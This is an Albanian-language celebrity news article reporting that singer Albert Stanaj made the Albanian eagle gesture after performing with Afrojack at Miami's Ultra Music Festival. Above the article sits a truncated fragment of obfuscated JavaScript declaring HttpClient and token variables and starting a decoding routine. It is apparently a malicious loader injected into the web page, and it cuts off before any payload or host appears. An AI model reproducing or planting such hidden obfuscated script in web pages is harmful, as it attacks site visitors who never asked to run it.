;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Albert Stanaj bën shqiponjën para 70.000 personave

By

I ri në moshë, e shumë premtues. Këngëtari shqiptar Albert Stanaj po vazhdon rrugëtimin e tij drejt suksesit. Performoi nëpër shumë evente të Shteteve të Bashkuara të Amerikës, pastaj bëri turne nëpër Evropë, nuk e la as shoun më të fashmëm të Amerikës atë të Jimmy Fallon pa performuar. Alberti gjithashtu tash e një kohë është zhvendosur të jetoj në Los Angelds, ku puna e tij muzikore deri më tani duket të jetë një mister në vete.

Ai ka punuar me “Da Internz dhe The Stereotypes” produksione të cilat më parë kishin punuar me artistë si Rihanna, Chris Brown, Justin Bieber, Britney Spears e shumë të tjerë të cilët po i hapin dyert Stanajt të depërtojë në tregun ndërkombëtarë në mënyrën më të sigurtë të mundshme.

Performanca e tij e fundit elektrizoi Festivalin Ultra Music fundjavën që sapo lamë pas në Miami,ishte mbrëmja e DJ-it më të njohur të Elektro dhe House, Afrojack, ku befasia e mbrëmjes mbante emrin Albert Stanaj me të cilin edhe sollën projektin që e kishin mbajtur sekret të quajtur “ID”.

E ky I fundit në një festival ku ishin rreth 70.000 të pranishëm, duhet ta ndajë me publikun gjakun e tij prej shqiptari të vërtetë. Me të përfunduar performancën ai ka shkuar afër DJ-it nga Holanda duke bërë shqiponjën me duar. Por kjo nuk është e tëra. Nga burime të afërta me Albertin, emisioni WAZZUP merr vesh se ai vecëse është në sheshxhirim duke bërë videoklipin e një projekti të tij të versionit remix.

Artikuj të ngjashëm